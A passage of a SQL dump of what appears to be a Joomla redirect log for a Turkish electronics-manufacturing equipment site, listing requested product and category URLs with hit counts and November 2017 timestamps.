00:00:00',301),(14081,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-26 06:35:26','0000-00-00 00:00:00',301),(14082,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer/by,ordering?language=tr-tr',NULL,'','',14,0,'2017-11-26 06:42:42','0000-00-00 00:00:00',301),(14083,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-26 06:46:26','0000-00-00 00:00:00',301),(14084,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',20,0,'2017-11-26 06:53:45','0000-00-00 00:00:00',301),(14085,'http://3s-technologies.com.tr/tr/urunler/manufacturer/screen-printer',NULL,'','',18,0,'2017-11-26 06:57:30','0000-00-00 00:00:00',301),(14086,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-11-26 07:00:59','0000-00-00 00:00:00',301),(14087,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,pc.ordering,product_name/dirdesc/results,1-100',NULL,'','',10,0,'2017-11-26 07:13:06','0000-00-00 00:00:00',301),(14088,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2017-11-26 07:24:55','0000-00-00 00:00:00',301),(14089,'http://3s-technologies.com.tr/en/products/manufacturer/smd-fırın',NULL,'','',444,0,'2017-11-26 07:36:31','0000-00-00 00:00:00',301),(14090,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,`p`.product_sku/results,1-10',NULL,'','',10,0,'2017-11-26 07:36:42','0000-00-00 00:00:00',301),(14091,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-100',NULL,'','',4,0,'2017-11-26 07:48:30','0000-00-00 00:00:00',301),(14092,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_name?language=tr-tr',NULL,'','',25,0,'2017-11-26 07:53:15','0000-00-00 00:00:00',301),(14093,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-26 08:00:49','0000-00-00 00:00:00',301),(14094,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by?language=en-gb&mf_name/dirdesc',NULL,'','',1,0,'2017-11-26 08:03:52','0000-00-00 00:00:00',301),(14095,'http://3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,mf_name',NULL,'','',17,0,'2017-11-26 08:05:00','0000-00-00 00:00:00',301),(14096,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/dirdesc?language=tr-tr',NULL,'','',26,0,'2017-11-26 08:05:27','0000-00-00 00:00:00',301),(14097,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-26 08:06:12','0000-00-00 00:00:00',301),(14098,'http://www.3s-technologies.com.tr/en/home-page',NULL,'','',40,0,'2017-11-26 08:07:12','0000-00-00 00:00:00',301),(14099,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',413,0,'2017-11-26 08:07:31','0000-00-00 00:00:00',301),(14100,'http://www.3s-technologies.com.tr/en/products/smd-5,000cph',NULL,'','',13,0,'2017-11-26 08:07:31','0000-00-00 00:00:00',301),(14101,'http://www.3s-technologies.com.tr/en/products/smd-orta',NULL,'','',13,0,'2017-11-26 08:07:35','0000-00-00 00:00:00',301),(14102,'http://www.3s-technologies.com.tr/en/products/through-hole-makineleri',NULL,'','',13,0,'2017-11-26 08:07:41','0000-00-00 00:00:00',301),(14103,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-26 08:09:00','0000-00-00 00:00:00',301),(14104,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2017-11-26 08:12:06','0000-00-00 00:00:00',301),(14105,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/dirdesc',NULL,'','',353,0,'2017-11-26 08:26:08','0000-00-00 00:00:00',301),(14106,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail',NULL,'','',177,0,'2017-11-26 08:26:20','0000-00-00 00:00:00',301),(14107,'http://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',176,0,'2017-11-26 08:26:27','0000-00-00 00:00:00',301),(14108,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-26 08:27:02','0000-00-00 00:00:00',301),(14109,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-26 08:28:07','0000-00-00 00:00:00',301),(14110,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc/results,1-50',NULL,'','',3,0,'2017-11-26 08:30:06','0000-00-00 00:00:00',301),(14111,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/contacts-en',NULL,'','',9,0,'2017-11-26 08:31:09','0000-00-00 00:00:00',301),(14112,'http://3s-technologies.com.tr/en/products/rh6-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-26 08:33:15','0000-00-00 00:00:00',301),(14113,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim/by,mf_name?language=tr-tr',NULL,'','',23,0,'2017-11-26 08:36:57','0000-00-00 00:00:00',301),(14114,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',416,0,'2017-11-26 08:37:57','0000-00-00 00:00:00',301),(14115,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-100',NULL,'','',1,0,'2017-11-26 08:54:06','0000-00-00 00:00:00',301),(14116,'http://3s-technologies.com.tr/tr/urunler/screen-printer/by,product_name',NULL,'','',20,0,'2017-11-26 08:58:19','0000-00-00 00:00:00',301),(14117,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-10',NULL,'','',2,0,'2017-11-26 09:00:07','0000-00-00 00:00:00',301),(14118,'http://3s-technologies.com.tr/en/products/avb-detail?tmpl=component&print=1',NULL,'','',19,0,'2017-11-26 09:01:41','0000-00-00 00:00:00',301),(14119,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',432,0,'2017-11-26 09:02:08','0000-00-00 00:00:00',301),(14120,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',390,0,'2017-11-26 09:03:50','0000-00-00 00:00:00',301),(14121,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-11-26 09:11:21','0000-00-00 00:00:00',301),(14122,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,mf_name/results,1-5',NULL,'','',9,0,'2017-11-26 09:12:07','0000-00-00 00:00:00',301),(14123,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hız',NULL,'','',427,0,'2017-11-26 09:21:33','0000-00-00 00:00:00',301),(14124,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',419,0,'2017-11-26 09:26:53','0000-00-00 00:00:00',301),(14125,'http://www.3s-technologies.com.tr/index.php/en/products/ly-8c-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-26 09:35:30','0000-00-00 00:00:00',301),(14126,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-26 09:42:06','0000-00-00 00:00:00',301),(14127,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,ordering?language=tr-tr',NULL,'','',6,0,'2017-11-26 09:43:46','0000-00-00 00:00:00',301),(14128,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-26 09:53:26','0000-00-00 00:00:00',301),(14129,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-26 09:54:07','0000-00-00 00:00:00',301),(14130,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku?language=en-gb',NULL,'','',2,0,'2017-11-26 09:57:12','0000-00-00 00:00:00',301),(14131,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-40',NULL,'','',4,0,'2017-11-26 10:06:06','0000-00-00 00:00:00',301),(14132,'http://3s-technologies.com.tr/en/products/manufacturers/kester',NULL,'','',19,0,'2017-11-26 10:25:18','0000-00-00 00:00:00',301),(14133,'http://3s-technologies.com.tr/tr/urunler/manufacturer/dalga-lehim',NULL,'','',9,0,'2017-11-26 10:28:41','0000-00-00 00:00:00',301),(14134,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5?language=en-gb',NULL,'','',2,0,'2017-11-26 10:30:06','0000-00-00 00:00:00',301),(14135,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-26 10:33:05','0000-00-00 00:00:00',301),(14136,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',402,0,'2017-11-26 10:54:07','0000-00-00 00:00:00',301),(14137,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_sku?language=en-gb',NULL,'','',20,0,'2017-11-26 10:54:55','0000-00-00 00:00:00',301),(14138,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',5,0,'2017-11-26 11:00:07','0000-00-00 00:00:00',301),(14139,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,mf_name/results,1-100',NULL,'','',2,0,'2017-11-26 11:06:06','0000-00-00 00:00:00',301),(14140,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/by,category_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-11-26 11:16:56','0000-00-00 00:00:00',301),(14141,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by?language=en-gb&product_name',NULL,'','',1,0,'2017-11-26 11:24:04','0000-00-00 00:00:00',301),(14142,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın?language=en-gb',NULL,'','',1,0,'2017-11-26 11:24:08','0000-00-00 00:00:00',301),(14143,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',394,0,'2017-11-26 11:24:22','0000-00-00 00:00:00',301),(14144,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',8,0,'2017-11-26 11:26:12','0000-00-00 00:00:00',301),(14145,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',22,0,'2017-11-26 11:29:58','0000-00-00 00:00:00',301),(14146,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20?language=en-gb',NULL,'','',5,0,'2017-11-26 11:42:06','0000-00-00 00:00:00',301),(14147,'http://www.3s-technologies.com.tr/tr/urunler/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-26 11:44:52','0000-00-00 00:00:00',301),(14148,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_name/results,1-50',NULL,'','',13,0,'2017-11-26 11:48:06','0000-00-00 00:00:00',301),(14149,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',3,0,'2017-11-26 11:54:06','0000-00-00 00:00:00',301),(14150,'http://www.3s-technologies.com.tr/en/products/manufacturer/kester',NULL,'','',31,0,'2017-11-26 12:04:57','0000-00-00 00:00:00',301),(14151,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/mirae-mx_400_s_250x250.gif',NULL,'','',1,0,'2017-11-26 12:14:07','0000-00-00 00:00:00',301),(14152,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-11-26 12:18:06','0000-00-00 00:00:00',301),(14153,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/by,product_sku',NULL,'','',19,0,'2017-11-26 12:21:51','0000-00-00 00:00:00',301),(14154,'https://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 12:23:38','0000-00-00 00:00:00',301),(14155,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',14,0,'2017-11-26 12:24:03','0000-00-00 00:00:00',301),(14156,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_sku/results,1-10',NULL,'','',4,0,'2017-11-26 12:24:06','0000-00-00 00:00:00',301),(14157,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/kester-logo2_250x250.jpg',NULL,'','',6,0,'2017-11-26 12:27:48','0000-00-00 00:00:00',301),(14158,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',7,0,'2017-11-26 12:30:14','0000-00-00 00:00:00',301),(14159,'http://3s-technologies.com.tr/tr/urunler/manufacturers/kester',NULL,'','',15,0,'2017-11-26 12:31:03','0000-00-00 00:00:00',301),(14160,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-26 12:31:10','0000-00-00 00:00:00',301),(14161,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku?error=404&language=en-gb',NULL,'','',1,0,'2017-11-26 12:38:17','0000-00-00 00:00:00',301),(14162,'http://3s-technologies.com.tr/tr/urunler/thru-hole/by,category_name',NULL,'','',12,0,'2017-11-26 12:58:54','0000-00-00 00:00:00',301),(14163,'http://3s-technologies.com.tr/index.php/en/products/thru-hole/by?category_name&language=en-gb',NULL,'','',1,0,'2017-11-26 13:01:13','0000-00-00 00:00:00',301),(14164,'https://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 13:10:45','0000-00-00 00:00:00',301),(14165,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc/results,1-50',NULL,'','',3,0,'2017-11-26 13:12:06','0000-00-00 00:00:00',301),(14166,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/by,product_sku',NULL,'','',10,0,'2017-11-26 13:12:57','0000-00-00 00:00:00',301),(14167,'http://www.3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/by,mf_name?language=en-gb',NULL,'','',23,0,'2017-11-26 13:13:28','0000-00-00 00:00:00',301),(14168,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by?`p`.product_sku/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-26 13:14:31','0000-00-00 00:00:00',301),(14169,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/by,category_name',NULL,'','',20,0,'2017-11-26 13:16:34','0000-00-00 00:00:00',301),(14170,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-26 13:18:06','0000-00-00 00:00:00',301),(14171,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın',NULL,'','',278,0,'2017-11-26 13:20:00','0000-00-00 00:00:00',301),(14172,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_250x250.jpg',NULL,'','',3,0,'2017-11-26 13:20:10','0000-00-00 00:00:00',301),(14173,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2017-11-26 13:24:05','0000-00-00 00:00:00',301),(14174,'http://3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,product_name',NULL,'','',402,0,'2017-11-26 13:25:25','0000-00-00 00:00:00',301),(14175,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc/results,1-20',NULL,'','',7,0,'2017-11-26 13:28:55','0000-00-00 00:00:00',301),(14176,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name',NULL,'','',17,0,'2017-11-26 13:30:01','0000-00-00 00:00:00',301),(14177,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/by,product_name/results,1-40',NULL,'','',1,0,'2017-11-26 13:42:05','0000-00-00 00:00:00',301),(14178,'http://3s-technologies.com.tr/en/products/konveyorler/by,category_name',NULL,'','',8,0,'2017-11-26 13:50:01','0000-00-00 00:00:00',301),(14179,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?category_name/dirdesc&language=en-gb',NULL,'','',1,0,'2017-11-26 13:52:31','0000-00-00 00:00:00',301),(14180,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-26 14:00:05','0000-00-00 00:00:00',301),(14181,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',12,0,'2017-11-26 14:02:30','0000-00-00 00:00:00',301),(14182,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2017-11-26 14:14:23','0000-00-00 00:00:00',301),(14183,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/beez5/home-page-beez5/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',25,0,'2017-11-26 14:31:38','0000-00-00 00:00:00',301),(14184,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by?language=en-gb&mf_name',NULL,'','',1,0,'2017-11-26 14:31:47','0000-00-00 00:00:00',301),(14185,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2017-11-26 14:36:05','0000-00-00 00:00:00',301),(14186,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/dirdesc?language=en-gb',NULL,'','',2,0,'2017-11-26 14:45:54','0000-00-00 00:00:00',301),(14187,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,product_name',NULL,'','',11,0,'2017-11-26 14:45:57','0000-00-00 00:00:00',301),(14188,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-11-26 14:45:58','0000-00-00 00:00:00',301),(14189,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/rh6-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-26 14:48:34','0000-00-00 00:00:00',301),(14190,'http://3s-technologies.com.tr/tr/urunler/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',22,0,'2017-11-26 14:49:28','0000-00-00 00:00:00',301),(14191,'http://www.3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme/results,1-20',NULL,'','',15,0,'2017-11-26 15:00:05','0000-00-00 00:00:00',301),(14192,'https://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-11-26 15:05:32','0000-00-00 00:00:00',301),(14193,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/e-bar-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-26 15:18:08','0000-00-00 00:00:00',301),(14194,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name?language=en-gb',NULL,'','',8,0,'2017-11-26 15:34:11','0000-00-00 00:00:00',301),(14195,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2017-11-26 15:36:06','0000-00-00 00:00:00',301),(14196,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name',NULL,'','',9,0,'2017-11-26 15:37:20','0000-00-00 00:00:00',301),(14197,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/dirdesc',NULL,'','',8,0,'2017-11-26 15:43:59','0000-00-00 00:00:00',301),(14198,'https://www.3s-technologies.com.tr/index.php/en/products?error=404',NULL,'','',1,0,'2017-11-26 15:46:23','0000-00-00 00:00:00',301),(14199,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-11-26 15:54:05','0000-00-00 00:00:00',301),(14200,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/by,mf_name?language=en-gb',NULL,'','',8,0,'2017-11-26 16:08:09','0000-00-00 00:00:00',301),(14201,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-10?language=en-gb',NULL,'','',1,0,'2017-11-26 16:11:39','0000-00-00 00:00:00',301),(14202,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/dalga-lehim/by,product_name',NULL,'','',8,0,'2017-11-26 16:13:30','0000-00-00 00:00:00',301),(14203,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/zero-ion-g3-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-26 16:29:28','0000-00-00 00:00:00',301),(14204,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',4,0,'2017-11-26 16:30:05','0000-00-00 00:00:00',301),(14205,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/r256.pdf',NULL,'','',51,0,'2017-11-26 16:36:06','0000-00-00 00:00:00',301),(14206,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',4,0,'2017-11-26 17:12:05','0000-00-00 00:00:00',301),(14207,'http://3s-technologies.com.tr/tr/urunler/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-26 17:27:26','0000-00-00 00:00:00',301),(14208,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name?language=en-gb',NULL,'','',7,0,'2017-11-26 17:42:05','0000-00-00 00:00:00',301),(14209,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/dirdesc?language=tr-tr',NULL,'','',28,0,'2017-11-26 17:48:13','0000-00-00 00:00:00',301),(14210,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/results,1-20?language=en-gb',NULL,'','',4,0,'2017-11-26 18:00:05','0000-00-00 00:00:00',301),(14211,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/by,mf_name/dirdesc',NULL,'','',9,0,'2017-11-26 18:06:05','0000-00-00 00:00:00',301),(14212,'http://3s-technologies.com.tr/index.php/tr/ueruenler/rl132-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-11-26 18:07:44','0000-00-00 00:00:00',301),(14213,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic',NULL,'','',41,0,'2017-11-26 18:09:53','0000-00-00 00:00:00',301),(14214,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',14,0,'2017-11-26 18:36:54','0000-00-00 00:00:00',301),(14215,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',53,0,'2017-11-26 18:46:15','0000-00-00 00:00:00',301),(14216,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/screen-printer?language=tr-tr',NULL,'','',7,0,'2017-11-26 18:53:18','0000-00-00 00:00:00',301),(14217,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/jvk-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-11-26 19:03:32','0000-00-00 00:00:00',301),(14218,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/by,ordering?language=en-gb',NULL,'','',24,0,'2017-11-26 19:10:47','0000-00-00 00:00:00',301),(14219,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by,product_sku?language=en-gb',NULL,'','',2,0,'2017-11-26 19:38:20','0000-00-00 00:00:00',301),(14220,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_sku?language=tr-tr',NULL,'','',1,0,'2017-11-26 19:51:22','0000-00-00 00:00:00',301),(14221,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-26 20:07:28','0000-00-00 00:00:00',301),(14222,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-26 20:17:02','0000-00-00 00:00:00',301),(14223,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/results,1-100',NULL,'','',3,0,'2017-11-26 20:32:13','0000-00-00 00:00:00',301),(14224,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-11-26 21:12:46','0000-00-00 00:00:00',301),(14225,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',27,0,'2017-11-26 21:24:53','0000-00-00 00:00:00',301),(14226,'http://www.3s-technologies.com.tr/index.php/en/products/2.-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-26 21:32:51','0000-00-00 00:00:00',301),(14227,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',24,0,'2017-11-26 21:39:34','0000-00-00 00:00:00',301),(14228,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering?language=en-gb',NULL,'','',1,0,'2017-11-26 21:41:18','0000-00-00 00:00:00',301),(14229,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,`p`.product_sku?language=tr-tr',NULL,'','',25,0,'2017-11-26 22:12:21','0000-00-00 00:00:00',301),(14230,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_sku?language=en-gb',NULL,'','',24,0,'2017-11-26 22:25:44','0000-00-00 00:00:00',301),(14231,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-5?language=en-gb&filter_product=',NULL,'','',3,0,'2017-11-26 22:34:14','0000-00-00 00:00:00',301),(14232,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-11-26 23:11:41','0000-00-00 00:00:00',301),(14233,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',26,0,'2017-11-27 00:14:03','0000-00-00 00:00:00',301),(14234,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/results,1-20?language=en-gb&filter_product=',NULL,'','',4,0,'2017-11-27 00:42:22','0000-00-00 00:00:00',301),(14235,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.6mm-detail',NULL,'','',2,0,'2017-11-27 01:00:40','0000-00-00 